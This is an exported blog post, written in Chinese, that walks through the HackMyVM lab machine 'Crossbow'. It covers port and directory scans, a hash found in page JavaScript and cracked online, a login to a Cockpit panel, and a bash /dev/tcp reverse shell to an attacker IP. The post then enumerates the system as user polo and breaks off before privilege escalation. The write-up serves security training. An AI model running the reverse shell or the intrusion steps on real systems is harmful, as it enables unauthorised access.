{"id":498,"date":"2024-04-03T22:06:09","date_gmt":"2024-04-03T14:06:09","guid":{"rendered":"http:\/\/162.14.82.114\/?p=498"},"modified":"2024-04-03T22:06:09","modified_gmt":"2024-04-03T14:06:09","slug":"hmv-_-crossbow","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/498\/04\/03\/2024\/","title":{"rendered":"hmv[-_-]Crossbow"},"content":{"rendered":"<h1>Crossbow<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205673.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205673.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403200149466\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.3 -- -A<\/code><\/pre>\n<pre><code class=\"language-css\">Open 172.20.10.3:22\nOpen 172.20.10.3:80\nOpen 172.20.10.3:9090\n\nPORT     STATE SERVICE     REASON  VERSION\n22\/tcp   open  ssh         syn-ack OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n80\/tcp   open  http        syn-ack Apache 
httpd 2.4.57 ((Debian))\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Polo&#039;s Adventures\n|_http-server-header: Apache\/2.4.57 (Debian)\n9090\/tcp open  zeus-admin? syn-ack\n| fingerprint-strings: \n|   GetRequest, HTTPOptions: \n|     HTTP\/1.1 400 Bad request\n|     Content-Type: text\/html; charset=utf8\n|     Transfer-Encoding: chunked\n|     X-DNS-Prefetch-Control: off\n|     Referrer-Policy: no-referrer\n|     X-Content-Type-Options: nosniff\n|     Cross-Origin-Resource-Policy: same-origin\n|     X-Frame-Options: sameorigin\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html&gt;\n|     &lt;head&gt;\n|     &lt;title&gt;\n|     request\n|     &lt;\/title&gt;\n|     &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text\/html; charset=utf-8&quot;&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n|     &lt;style&gt;\n|     body {\n|     margin: 0;\n|     font-family: &quot;RedHatDisplay&quot;, &quot;Open Sans&quot;, Helvetica, Arial, sans-serif;\n|     font-size: 12px;\n|     line-height: 1.66666667;\n|     color: #333333;\n|     background-color: #f5f5f5;\n|     border: 0;\n|     vertical-align: middle;\n|_    font-weight: 300;\n1 service unrecognized despite returning data. 
If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port9090-TCP:V=7.94SVN%I=7%D=4\/3%Time=660D456F%P=x86_64-pc-linux-gnu%r(\nSF:GetRequest,DB1,&quot;HTTP\/1\\.1\\x20400\\x20Bad\\x20request\\r\\nContent-Type:\\x20\nSF:text\/html;\\x20charset=utf8\\r\\nTransfer-Encoding:\\x20chunked\\r\\nX-DNS-Pr\nSF:efetch-Control:\\x20off\\r\\nReferrer-Policy:\\x20no-referrer\\r\\nX-Content-\nSF:Type-Options:\\x20nosniff\\r\\nCross-Origin-Resource-Policy:\\x20same-origi\nSF:n\\r\\nX-Frame-Options:\\x20sameorigin\\r\\n\\r\\n29\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;h\nSF:tml&gt;\\n&lt;head&gt;\\n\\x20\\x20\\x20\\x20&lt;title&gt;\\r\\nb\\r\\nBad\\x20request\\r\\nc2c\\r\\n\nSF:&lt;\/title&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20http-equiv=\\&quot;Content-Type\\&quot;\\x20conte\nSF:nt=\\&quot;text\/html;\\x20charset=utf-8\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20name=\\&quot;vi\nSF:ewport\\&quot;\\x20content=\\&quot;width=device-width,\\x20initial-scale=1\\.0\\&quot;&gt;\\n\\x2\nSF:0\\x20\\x20\\x20&lt;style&gt;\\n\\tbody\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20margin:\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20font-family:\\x20\\&quot;RedHatDisplay\\&quot;,\\x20\\&quot;Open\\x20Sans\\&quot;,\\x20Helvetic\nSF:a,\\x20Arial,\\x20sans-serif;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20font-size:\\x2012px;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20line-height:\\x201\\.66666667;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\\nSF:x20\\x20\\x20color:\\x20#333333;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20background-color:\\x20#f5f5f5;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:}\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20img\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20\\x20\\x20\\x20\\x20border:\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20\
\x20\\x20vertical-align:\\x20middle;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\\nSF:x20}\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20h1\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20font-weight:\\x20300;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\\nSF:x20\\x20}\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20p\\x20&quot;)%r(HTTPOptions,DB1,&quot;HT\nSF:TP\/1\\.1\\x20400\\x20Bad\\x20request\\r\\nContent-Type:\\x20text\/html;\\x20char\nSF:set=utf8\\r\\nTransfer-Encoding:\\x20chunked\\r\\nX-DNS-Prefetch-Control:\\x2\nSF:0off\\r\\nReferrer-Policy:\\x20no-referrer\\r\\nX-Content-Type-Options:\\x20n\nSF:osniff\\r\\nCross-Origin-Resource-Policy:\\x20same-origin\\r\\nX-Frame-Optio\nSF:ns:\\x20sameorigin\\r\\n\\r\\n29\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html&gt;\\n&lt;head&gt;\\n\\x20\nSF:\\x20\\x20\\x20&lt;title&gt;\\r\\nb\\r\\nBad\\x20request\\r\\nc2c\\r\\n&lt;\/title&gt;\\n\\x20\\x20\nSF:\\x20\\x20&lt;meta\\x20http-equiv=\\&quot;Content-Type\\&quot;\\x20content=\\&quot;text\/html;\\x2\nSF:0charset=utf-8\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20name=\\&quot;viewport\\&quot;\\x20conten\nSF:t=\\&quot;width=device-width,\\x20initial-scale=1\\.0\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;styl\nSF:e&gt;\\n\\tbody\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20margin\nSF::\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20font-family:\\x\nSF:20\\&quot;RedHatDisplay\\&quot;,\\x20\\&quot;Open\\x20Sans\\&quot;,\\x20Helvetica,\\x20Arial,\\x20sa\nSF:ns-serif;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20font-size:\\x\nSF:2012px;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20line-height:\\x\nSF:201\\.66666667;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20color:\\\nSF:x20#333333;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20background\nSF:-color:\\x20#f5f5f5;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\\x2\nSF:0\\x20\\x20\\x20\\x20img\\x20{\\n\\x20\\x20\
\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20border:\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20vert\nSF:ical-align:\\x20middle;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20h1\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20font-weight:\\x20300;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20p\\x20&quot;);\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p>\u5f00\u542f\u4e86 80 \u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u76ee\u5f55\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.3\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip<\/code><\/pre>\n<pre><code class=\"language-css\">\/.php                 (Status: 403) [Size: 276]\n\/.html.png            (Status: 403) [Size: 276]\n\/.php                 (Status: 403) [Size: 276]\n\/.html.png            (Status: 403) [Size: 276]\n\/server-status        (Status: 403) [Size: 276]<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.3<\/code><\/pre>\n<pre><code class=\"language-css\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.3\n+ Target Hostname:    172.20.10.3\n+ Target Port:        80\n+ Start Time:         2024-04-03 08:09:20 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.57 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. 
See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: 1455, size: 60575d67a7363, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .\n+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time:           2024-04-03 08:09:38 (GMT-4) (18 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h3>\u4e2d\u95f4\u4ef6\u67e5\u8be2<\/h3>\n<pre><code class=\"language-bash\">whatweb http:\/\/172.20.10.3                      \nhttp:\/\/172.20.10.3 [200 OK] Apache[2.4.57], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.57 (Debian)], IP[172.20.10.3], Script, Title[Polo&#039;s Adventures]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u9875\u9762\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205676.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205676.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403201442978\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u4e00\u4e0b\u63d2\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205677.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205677.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403202019625\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>F12\u770b\u4e00\u4e0b\u6709\u6ca1\u6709\u505adns\u89e3\u6790\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205678.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205678.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403202702072\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u85cf\u4e86\u4e1c\u897f\uff1a<\/p>\n<pre><code>const API_ENDPOINT = &quot;https:\/\/phishing.crossbow.hmv\/data&quot;;\nconst HASH_API_KEY = &quot;49ef6b765d39f06ad6a20bc951308393&quot;;\n\n\/\/ Metadata for last system upgrade\nconst SYSTEM_UPGRADE = {\n    version: &quot;2.3.1&quot;,\n    date: &quot;2023-04-15&quot;,\n    processedBy: &quot;SnefruTools V1&quot;,\n    description: &quot;Routine maintenance and security 
patches&quot;\n}<\/code><\/pre>\n<p>\u5f97\u5230\u4e00\u7ec4\u7b80\u5355\u7684\u7528\u6237\u540d\u5bc6\u7801\uff0c\u5e76\u4e14\u5f97\u5230\u5b83\u8fd9\u4e2a\u5bc6\u7801\u662f\u7531<code>SnefruTools V1<\/code>\u8fdb\u884c\u52a0\u5bc6\u5f97\u6765\u7684\uff0c\u5c1d\u8bd5\u770b\u770b\u8fd9\u662f\u4e2a\u5565\uff1a<\/p>\n<pre><code class=\"language-apl\">polo\n49ef6b765d39f06ad6a20bc951308393<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205679.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205679.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403204245548\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u4e86\u7f51\u5740\uff0c\u5728\u7ebf\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205680.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205680.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20240403204348468\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">ELzkRudzaNXRyNuN6<\/code><\/pre>\n<h3>\u8bbf\u95ee\u654f\u611f\u7aef\u53e3<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205681.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205681.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403202133689\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-apl\">polo\nELzkRudzaNXRyNuN6<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205682.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205682.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403204445424\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fdb\u6765\u4e86\u554a\uff01\uff01\uff01\u70b9\u51fb\u7ec8\u7aef\uff1a<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205683.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205683.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403204514424\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u628ashell\u5f39\u5230\u672c\u5730\u53bb\uff1a<\/p>\n<pre><code class=\"language-bash\">bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/172.20.10.8\/1234 &lt;&amp;1&#039;<\/code><\/pre>\n<pre><code class=\"language-bash\">sudo pwncat-cs -lp 1234 2&gt;\/dev\/null<\/code><\/pre>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/home\/polo$ whoami;id\npolo\nuid=1001(polo) gid=1001(polo) groups=1001(polo)\n(remote) polo@crossbow:\/home\/polo$ sudo -l\n[sudo] password for polo: \nSorry, user polo may not run sudo on crossbow.\n(remote) polo@crossbow:\/home\/polo$ cat 
\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nDebian-exim:x:100:102::\/var\/spool\/exim4:\/usr\/sbin\/nologin\nmessagebus:x:101:103::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nlea:x:1000:1000::\/home\/lea:\/bin\/bash\npolo:x:1001:1001:,,,:\/home\/polo:\/bin\/bash\npolkitd:x:996:996:polkit:\/nonexistent:\/usr\/sbin\/nologin\nmysql:x:103:106:MySQL Server,,,:\/nonexistent:\/bin\/false\n_rpc:x:104:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nstatd:x:105:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\ngluster:x:106:107::\/var\/lib\/glusterd:\/usr\/sbin\/nologin\ncockpit-ws:x:107:113::\/nonexistent:\/usr\/sbin\/nologin\ncockpit-wsinstance:x:108:114::\/nonexistent:\/usr\/sbin\/nologin\ndnsmasq:x:109:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\npedro:x:1002:1002::\/home\/pedro:\/bin\/sh\n(remote) polo@crossbow:\/home\/polo$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a 
directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly; }\n#\n(remote) polo@crossbow:\/home\/polo$ ls -la\ntotal 48\ndrwx------ 1 polo polo 4096 Sep 16  2023 .\ndrwxr-xr-x 1 root root 4096 Sep 18  2023 ..\nlrwxrwxrwx 1 root root    9 Sep  5  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 polo polo  220 Sep  3  2023 .bash_logout\n-rw-r--r-- 1 polo polo 3527 Sep 16  2023 .bashrc\ndrwx------ 2 polo polo 4096 Sep 15  2023 .cache\ndrwx------ 3 polo polo 4096 Sep 16  2023 .gnupg\ndrwxr-xr-x 3 polo polo 4096 Sep 16  2023 .local\n-rw-r--r-- 1 polo polo  807 Sep  3  2023 .profile\ndrwx------ 1 root root 4096 Sep  3  2023 .ssh\n(remote) polo@crossbow:\/home\/polo$ 
